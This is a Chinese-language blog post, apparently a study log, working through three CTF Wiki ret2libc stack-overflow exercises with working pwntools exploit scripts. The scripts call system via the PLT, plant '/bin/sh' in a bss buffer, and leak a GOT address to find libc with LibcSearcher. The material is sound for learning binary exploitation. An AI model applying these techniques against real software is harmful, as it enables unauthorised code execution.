<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="昨天算是把栈溢出最基础的题目做了做，今天继续，打算将ctf wiki里面关于ret2libc的题目做完，话不多说，直接开干 Ret2ilbc首先来简单的看一下原理，所谓的ret2libc也就是控制函数去执行libc的函数，也就是我们将返回地址设置为某个函数的plt位置或者是具体位置（即函数对应的GOT表项），当然，通过这种方式可以绕过NX的保护机制。 下面就来看ctf wiki给出的三个例题吧，首">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn学习（二）">
<meta property="og:url" content="http://yoursite.com/2018/11/18/pwn学习（二）/index.html">
<meta property="og:site_name" content="Asa9ao">
<meta property="og:description" content="昨天算是把栈溢出最基础的题目做了做，今天继续，打算将ctf wiki里面关于ret2libc的题目做完，话不多说，直接开干 Ret2ilbc首先来简单的看一下原理，所谓的ret2libc也就是控制函数去执行libc的函数，也就是我们将返回地址设置为某个函数的plt位置或者是具体位置（即函数对应的GOT表项），当然，通过这种方式可以绕过NX的保护机制。 下面就来看ctf wiki给出的三个例题吧，首">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://i.loli.net/2018/11/18/5bf14d7ab0691.jpg">
<meta property="og:image" content="https://i.loli.net/2018/11/18/5bf14d799d6b0.jpg">
<meta property="og:image" content="https://i.loli.net/2018/11/18/5bf14d79dd2f6.jpg">
<meta property="og:image" content="https://i.loli.net/2018/11/18/5bf14d7a55c91.jpg">
<meta property="og:image" content="https://i.loli.net/2018/11/18/5bf14d7a315ee.jpg">
<meta property="og:image" content="https://i.loli.net/2018/11/18/5bf14d7a36b5a.jpg">
<meta property="og:updated_time" content="2018-11-19T11:38:52.315Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pwn学习（二）">
<meta name="twitter:description" content="昨天算是把栈溢出最基础的题目做了做，今天继续，打算将ctf wiki里面关于ret2libc的题目做完，话不多说，直接开干 Ret2ilbc首先来简单的看一下原理，所谓的ret2libc也就是控制函数去执行libc的函数，也就是我们将返回地址设置为某个函数的plt位置或者是具体位置（即函数对应的GOT表项），当然，通过这种方式可以绕过NX的保护机制。 下面就来看ctf wiki给出的三个例题吧，首">
<meta name="twitter:image" content="https://i.loli.net/2018/11/18/5bf14d7ab0691.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/11/18/pwn学习（二）/">





  <title>pwn学习（二） | Asa9ao</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Asa9ao</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/11/18/pwn学习（二）/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Asa9ao">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Asa9ao">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">pwn学习（二）</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-11-18T19:25:46+08:00">
                2018-11-18
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index">
                    <span itemprop="name">pwn</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>昨天算是把栈溢出最基础的题目做了做，今天继续，打算将ctf wiki里面关于ret2libc的题目做完，话不多说，直接开干</p>
<h2 id="Ret2ilbc"><a href="#Ret2ilbc" class="headerlink" title="Ret2ilbc"></a>Ret2ilbc</h2><p>首先来简单的看一下原理，所谓的ret2libc也就是控制函数去执行libc的函数，也就是我们将返回地址设置为某个函数的plt位置或者是具体位置（即函数对应的GOT表项），当然，通过这种方式可以绕过NX的保护机制。</p>
<p>下面就来看ctf wiki给出的三个例题吧，首先是第一个</p>
<p><img src="https://i.loli.net/2018/11/18/5bf14d7ab0691.jpg" alt="1.jpg"></p>
<p>很显然gets处存在栈溢出漏洞，紧接着我们来看看程序给我们“提供”了什么可以利用的点</p>
<p><img src="https://i.loli.net/2018/11/18/5bf14d799d6b0.jpg" alt="2.jpg"></p>
<p><img src="https://i.loli.net/2018/11/18/5bf14d79dd2f6.jpg" alt="3.jpg"></p>
<p>可以看到程序非常大方的给了我们/bin/sh的字符串和system函数，那任务就结束了，我们只需要溢出s将函数的返回地址设置为system的地址，紧接着将system的参数设置为字符串的地址即可，直接上脚本了</p>
<pre><code class="python"><span class="keyword">from</span> pwn <span class="keyword">import</span> *
p = process(<span class="string">'./ret2libc1.dms'</span>)
system = <span class="number">0x8048460</span>
bin = <span class="number">0x08048720</span>
payload = flat([<span class="string">'a'</span>*<span class="number">112</span>,system,<span class="string">'b'</span>*<span class="number">4</span>],bin)
p.sendline(payload)
p.interactive()

</code></pre>
<p>注意，我们的system作为我们将要返回的函数，他自然也有要返回的函数，因为我们只需要拿到sh，所以他具体返回什么我们就不用操心了，所以直接拿4个b把他的返回地址给填充掉就好了。当然，这是我们手动找到了system函数的地址，是不是还有其他的办法呢？当然有了，脚本一改</p>
<pre><code class="python"><span class="keyword">from</span> pwn <span class="keyword">import</span> *
p = process(<span class="string">'./ret2libc1.dms'</span>)
elf = ELF(<span class="string">'./ret2libc1.dms'</span>)
system_addr = elf.plt[<span class="string">'system'</span>]
bin_addr = <span class="number">0x8048720</span>
payload = <span class="number">112</span>*<span class="string">'a'</span> + p32(system_addr) +<span class="string">'b'</span>*<span class="number">4</span> + p32(bin_addr)
p.sendline(payload)
p.interactive()
</code></pre>
<p>这里我们使用了ELF加载了我们的程序，而ELF的plt中就是保存着我们的地址与函数的一一映射，因此我们用plt[‘system’]就可以拿到system的地址了</p>
<p>紧接着看第二个题目</p>
<p><img src="https://i.loli.net/2018/11/18/5bf14d7a55c91.jpg" alt="4.jpg"></p>
<p>溢出点还是gets函数，但这次就没有第一次那么简单了，虽然还有system函数，但是没有可以供我们使用的/bin/sh字符串了，这时候我们就要开动脑筋想一想了，毛爷爷说过，没有条件创造条件，他没给字符串，我们可不可以自己输入一个进去呢？我们抓紧来看一下</p>
<p><img src="https://i.loli.net/2018/11/18/5bf14d7a315ee.jpg" alt="5.jpg"></p>
<p>首先就是天时啊，程序有个gets的函数，那我们何不借东风？拿它来一招瞒天过海？</p>
<p><img src="https://i.loli.net/2018/11/18/5bf14d7a36b5a.jpg" alt="6.jpg"></p>
<p>其次地利也有啊，bss段又个0x64长度的buf2数组没被用过，刚好我们瞒天过海而来的字符串就由它再暗度陈仓了。天时地利，就差exp了</p>
<pre><code class="python"><span class="keyword">from</span> pwn <span class="keyword">import</span> *
p = process(<span class="string">'./ret2libc2.dms'</span>)
elf = ELF(<span class="string">'./ret2libc2.dms'</span>)
gets_addr = elf.plt[<span class="string">'gets'</span>]
system_addr = elf.plt[<span class="string">'system'</span>]
pop_ebx = <span class="number">0x0804843d</span>
buf2 = <span class="number">0x804A080</span>
payload = <span class="number">112</span>*<span class="string">'a'</span> + p32(gets_addr) + p32(pop_ebx) + p32(buf2) + p32(system_addr) + <span class="number">4</span>*<span class="string">'a'</span> + p32(buf2)
p.sendline(payload)
p.sendline(<span class="string">"/bin/sh"</span>)
p.interactive()

</code></pre>
<p>这里简单提一句为什么会有个pop ebx，主要是gets函数其实是改变了堆栈状态的，我们这里使用了pop主要是为了平衡堆栈的，你pop谁都可以，add也行。</p>
<p>趁热打铁把第三题也做了，这个题比起上面的两个题难度系数高了很多，这次是既没有了system函数也没有了/bin/sh，那就比较麻烦了，我们要找的东西可就多了。不过有个好消息就是我们的system函数是属于libc，而libc.so里函数的相对偏移是一定的，更让人高兴的是即使程序ASLR的保护，也只是针对地址的中间位进行随机，最低的12位并不会发生改变，而这些github上都有人把工作给我们做好了，我们只需要知道一个函数在libc的地址，就可以顺藤摸瓜搞到所有函数（甚至还有字符串/bin/sh）的地址，这样就人工创造了天时地利，只差我们的exp了</p>
<pre><code class="python"><span class="keyword">from</span> pwn <span class="keyword">import</span> *
<span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher
p = process(<span class="string">'./ret2libc3.dms'</span>)
e = ELF(<span class="string">'./ret2libc3.dms'</span>)
puts_plt = e.plt[<span class="string">'puts'</span>]
puts_got = e.got[<span class="string">'puts'</span>]
main = e.symbols[<span class="string">'main'</span>]
p.recv()
p.sendline(flat([<span class="string">'A'</span> * <span class="number">0x70</span>, puts_plt, main, puts_got]))
puts_addr = u32(p.recv()[<span class="number">0</span>:<span class="number">4</span>])
libc = LibcSearcher(<span class="string">'puts'</span>, puts_addr)
libcbase = puts_addr - libc.dump(<span class="string">'puts'</span>)
system_addr = libcbase + libc.dump(<span class="string">'system'</span>)
binsh_addr = libcbase + libc.dump(<span class="string">'str_bin_sh'</span>)
p.sendline(flat([<span class="string">'A'</span> * <span class="number">104</span>, system_addr, <span class="string">'b'</span>*<span class="number">4</span>, binsh_addr]))
p.interactive()

</code></pre>
<p>这里用到了新的工具—LibcSearcher，这个工具主要是能够帮助我们轻松的利用已有的got表的泄漏快速找到我们想要的东西，用法也很简单LibcSeacher(‘函数名’,地址)得到了libc，之后libc.dump()就可以得到偏移了，之后按照之前的方法构造payload就好了。要注意这里我们的pad要-8，因为我们是在main函数里又调用了main函数。</p>
<p>successful</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/18/pwn学习（1）/" rel="next" title="pwn学习（1）">
                <i class="fa fa-chevron-left"></i> pwn学习（1）
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/11/18/pwn学习（3）ROP-Emporium32位练习/" rel="prev" title="pwn学习（3）ROP Emporium32位练习">
                pwn学习（3）ROP Emporium32位练习 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Asa9ao</p>
              <p class="site-description motion-element" itemprop="description">It's not who I am underneath, but it's what I do that defines me</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Ret2ilbc"><span class="nav-number">1.</span> <span class="nav-text">Ret2ilbc</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Asa9ao</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
